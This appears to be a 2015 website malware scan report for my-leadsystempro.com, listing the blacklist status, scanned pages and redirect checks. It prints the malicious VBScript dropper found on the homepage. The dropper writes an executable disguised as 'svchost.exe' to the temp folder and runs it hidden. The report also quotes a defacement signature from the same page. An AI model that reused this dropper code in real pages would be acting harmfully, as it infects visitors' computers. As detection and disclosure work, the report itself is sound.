Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=my-leadsystempro.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://my-leadsystempro.com/ | 200 OK Content-Length: 123975 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By The Syrian Revolution Soldiers ...[64 bytes skipped]... shortcut icon" type="image/vnd.microsoft.icon" /> </head> <body> <div id="container"> <div id="logo" class="shadowed" title="The Syrian Revolution Soldiers مجهولو سوريا"> <font color="#FFFFFF"> <title>Hacked By The Syrian Revolution Soldiers</title> <link href='http://fonts.googleapis.com/css?family=Tahoma:700' rel='stylesheet' type='text/css'> </font> <p align="center"><font color="#FFFFFF"> <!-- no txt inicio --><script language="Javascript"> <!-- Begin function disableselect(e){ return false } function reEnable(){ return true } document.onselectstart=new Function ("return false") if ...[125358 bytes skipped]...
http://my-leadsystempro.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: my-leadsystempro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 08 Jul 2015 08:45:05 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=af7todn37jb6eeo01ovoiti340; path=/
Set-Cookie: wpgb_visit_last_php-default=1436345106; expires=Thu, 07-Jul-2016 08:45:06 GMT; path=/
X-Pingback: http://my-leadsystempro.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: my-leadsystempro.com
Referer: http://www.google.com/search?q=my-leadsystempro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.